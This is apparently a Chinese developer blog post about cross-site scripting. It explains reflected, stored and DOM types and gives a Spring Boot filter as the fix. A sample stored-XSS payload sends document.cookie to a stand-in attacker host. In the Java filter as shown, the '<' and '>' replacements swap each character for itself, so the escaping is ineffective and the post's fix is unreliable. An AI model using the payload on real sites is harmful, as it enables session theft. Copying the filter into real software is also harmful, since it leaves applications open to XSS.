- 1推荐中AB实验最大的问题——流量偏置及解决方案:重叠实验架构_实验流量不均分的问题
- 2完美解决:idea中切换jdk版本_idea切换jdk
- 3文心一言赋能问卷生成,打造高效问卷调研工具
- 4解决 github 无法访问 fatal: unable to access 、超时 Timed out_github unable to access
- 5【小沐学NLP】Python实现聊天机器人(Selenium、七嘴八舌)_python电商聊天机器人
- 6printf(str) 和 printf(str,%s) 的区别
- 7python中用xlrd和xlwt写入excel,在sheet中先写入的数据被后写入的数据覆盖的问题。_xlwr保存覆盖
- 8使用 SPL 高效实现 Flink SLS Connector 下推
- 9C++新手项目实践 — 智能人机对战五子棋_c++五子棋人机对战晦棋
- 10深度学习:注意力机制Attention_attention机制
XSS(跨站脚本攻击)及部分解决方案_xss攻击原理与解决方法
赞
踩
最近做的部门内部用的一个小项目要上线,上线前安全测试测出了存储型XSS漏洞,自己也通过这个机会学习了一下,在此记录
1、什么是XSS
XSS的中文含义是跨站脚本攻击,Cross Site Scripting,缩写为CSS,但容易与层叠样式表的缩写混淆,所以有人将其缩写为XSS
2、XSS原理
html是超文本标记语言,通过一些字符特殊对待来区分文本和标记,例如:<被看作html标签的开始,>被看作html标签的结束,那么<title>与</title>之间的内容就会被看作是标题。如果动态页面中插入的内容包含这些特殊字符(如:<等),用户浏览器就会将其误认为是html标签,如果被认为是html标签的内容中引入了一些js脚本,那么这些脚本就会在用户浏览器中执行,所以当这些特殊字符不能被动态界面检查或识别的时候,就会出现XSS漏洞。
3、XSS危害
1、窃取管理员帐号或Cookie,入侵者可以冒充管理员的身份登录后台。使得入侵者具有恶意操纵后台数据的能力,包括读取、更改、添加、删除一些信息。
2、窃取用户的个人信息或者登录帐号,对网站的用户安全产生巨大的威胁。例如冒充用户身份进行各种操作。
3、网站挂马。先将恶意攻击代码嵌入到Web应用程序之中。当用户浏览该挂马页面时,用户的计算机会被植入木马。
4、发送广告或者垃圾信息。攻击者可以利用XSS漏洞植入广告,或者发送垃圾信息,严重影响到用户的正常使用。
4、XSS分类
反射型XSS:攻击者通过向某URL中追加非法脚本(非法脚本其实就是通过非法字符构成的脚本)的方式,使得用户在访问此URL的时候会执行脚本内容,使得攻击者窃取到想要的数据。因为反射型XSS不会永久存储数据,只发生在用户一次访问过程中,所以有时也被叫做“非持久型XSS”
例如:在url中追加<script>alert('你被攻击了!')</script>,那么用户在访问url的时候就会弹出'你被攻击了!',这只是很简单的模拟场景,真实攻击的时候并不会这么简单,而是在脚本中抓取用户数据等,造成信息泄露。
个人理解的反射型XSS流程图
存储型XSS:
也叫“持久型XSS”,攻击者通过页面中的输入信息输入非法字符,并通过浏览器传送到服务器,以数据形式永久存储至数据库中,用户每次访问此数据都会触发非法脚本,造成持久性的危害。
例如:在web平台中添加信息时,将信息的备注属性设置为
- <a id='attacker'>点击就送百元现金</a>
- <script>
- document.getElementById('attacker').href=
- 'http://www.attacker_741.com/receiveCookies.html?'+document.cookie;
- </script>
之后点击添加,这段脚本就会作为备注存入至数据库中,之后每次访问相关的信息时,都会带着cookie信息跳转,造成持久性的攻击
存储型XSS流程与反射型XSS一样,区别在于存储型XSS会将非法脚本存入数据库,构成更加持久的危害。
DOM型XSS:
小白表示很迷.........
借鉴:DOM XSS是基于在js上的。而且他不需要与服务端进行交互,像反射、储蓄都需要服务端的反馈来构造xss,因为服务端对我们是不可见的
5、存储型XSS攻击Java解决方案
我的项目被扫出的只有存储型XSS漏洞,所以我只做了存储型XSS的漏洞修复,其他的后期遇到会补充进来。
我在网上看了挺多修复的方式,可以前端通过正则验证非法字符,也可以后端通过过滤器处理HttpRequest中的特殊字符,我是后端,对于改前端多少有些排斥,所以选择了配置过滤器的方式才进行漏洞修复。Springboot项目中代码如下:
- package com.web.filter;
-
- import com.web.interceptor.XSSInterceptor;
- import org.springframework.stereotype.Component;
-
- import javax.servlet.*;
- import javax.servlet.http.HttpServletRequest;
- import java.io.IOException;
-
- /**
- * @author Peacock_
- * @version 1.0
- * @date 2019/12/25 14:47
- * 用于避免存储型XSS漏洞
- */
- @Component
- public class XSSFilter implements Filter {
-
- FilterConfig filterConfig = null;
-
- @Override
- public void init(FilterConfig filterConfig) throws ServletException {
- this.filterConfig = filterConfig;
- }
-
- @Override
- public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
- filterChain.doFilter(new XSSInterceptor( (HttpServletRequest) servletRequest), servletResponse);
- }
-
- @Override
- public void destroy() {
- this.filterConfig = null;
- }
- }
- package com.web.interceptor;
-
- import javax.servlet.http.HttpServletRequest;
- import javax.servlet.http.HttpServletRequestWrapper;
-
- /**
- * @author Peacock_
- * @version 1.0
- * @date 2019/12/25 14:51
- * 用于处理特殊字符
- */
- public class XSSInterceptor extends HttpServletRequestWrapper {
- public XSSInterceptor(HttpServletRequest request) {
- super(request);
- }
-
- public String[] getParameterValues(String parameter) {
- String[] values = super.getParameterValues(parameter);
- if (values==null) {
- return null;
- }
- int count = values.length;
- String[] encodedValues = new String[count];
- for (int i = 0; i < count; i++) {
- encodedValues[i] = cleanXSS(values[i]);
- }
- return encodedValues;
- }
- public String getParameter(String parameter) {
- String value = super.getParameter(parameter);
- if (value == null) {
- return null;
- }
- return cleanXSS(value);
- }
- public String getHeader(String name) {
- String value = super.getHeader(name);
- if (value == null)
- return null;
- return cleanXSS(value);
- }
-
- /**过滤规则
- * 1、"script"替换为""
- * 2、"<"替换为"<"
- * 3、">"替换为">"
- * 4、"iframe"替换为""
- * @param value
- * @return
- */
- private String cleanXSS(String value) {
- value = value.replaceAll("<", "<").replaceAll(">", ">");
- value = value.replaceAll("script", " ");
- value = value.replaceAll("iframe", " ");
- value = value.replaceAll("[\\\"\\\'][\\s]*javascript:(.*)[\\\"\\\']", "\"\"");
- return value;
- }
-
- }
